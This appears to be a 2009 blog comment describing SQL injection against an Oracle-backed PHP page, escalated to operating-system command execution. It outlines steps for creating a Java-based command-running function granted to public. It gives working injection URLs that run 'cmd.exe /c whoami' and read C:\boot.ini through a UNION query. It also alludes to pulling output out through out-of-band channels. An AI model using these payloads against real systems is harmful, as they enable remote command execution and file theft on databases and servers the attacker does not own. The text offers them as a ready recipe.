I finally managed to get this working. Just followed the instructions on the website:
These are the 5 steps:
1. create java class
2. give execute permissions on java
3. create function to run cmd
4. grant execute on function to public
5. run the command.
I have copied all the long SQL commands in a text file to make things easier.
An example of command execution is:
http://192.168.172.129:81/ora2.php?name=1%20and%201=
(select%20sys.LinxRunCMD(%27cmd.exe%20/c%20whoami%27)%20from%20dual)
The website also talks about some cool hacks to get the output of the command through OOB channels.
2:27 pm on April 27th, 2009
the text file also contains function to read files and you can get the output through UNION query as:
http://192.168.172.129:81/ora2.php?name=1%20union%20all%20select%20sys.LinxReadFile(‘C:\boot.ini’)%20from%20dual
So, execute command, pipe the output to a file and read it back via union.